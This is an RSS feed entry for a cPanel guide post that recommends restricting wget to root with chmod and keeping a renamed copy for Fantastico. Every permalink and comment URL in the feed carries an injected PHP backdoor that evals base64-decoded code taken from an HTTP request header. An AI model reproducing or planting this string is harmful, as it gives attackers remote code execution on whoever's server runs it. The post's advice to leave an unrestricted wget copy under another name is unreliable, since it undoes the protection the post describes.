cPanelConfig - cPanel server configuration guide » permissions http://www.cpanelconfig.com The complete guide to setup and manage a cPanel based server Fri, 17 Jul 2009 11:15:39 +0000 http://wordpress.org/?v=2.8 en hourly 1 Disable wget http://www.cpanelconfig.com/2007/11/06/disable-wget/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/ http://www.cpanelconfig.com/2007/11/06/disable-wget/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments Tue, 06 Nov 2007 13:41:16 +0000 yolau http://www.cpanelconfig.com/uncategorized/disable-wget/ wget is one of the largest threats for your server security. A single abuser that gains access to wget can download and run any script that he wants, totally compromising your server.

It is highly recommended that you allow only root to use wget and you restrict all other users from it.

  1. Login to your server as root
  2. Run the fallowing command

    3. chmod 0700 /usr/bin/wget

Please note that disabling wget might cause some scripts to stop working. A known problem is that Fantastico will stop updating after this. The solution is pretty easy…
Before you disable wget make sure that you do a copy of it with the initial permissions. You can use any name that you want, the fallowing is just an example:

cp /usr/bin/wget /usr/bin/wget_secret


In the Fantastico configuration input the location to wget as:

/usr/bin/wget_secret

If for some reason you you want to revert the change you simply have to do:

chmod 0711 /usr/bin/wget

If you have any questions or suggestions please leave a comment.

]]> http://www.cpanelconfig.com/2007/11/06/disable-wget/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/ 3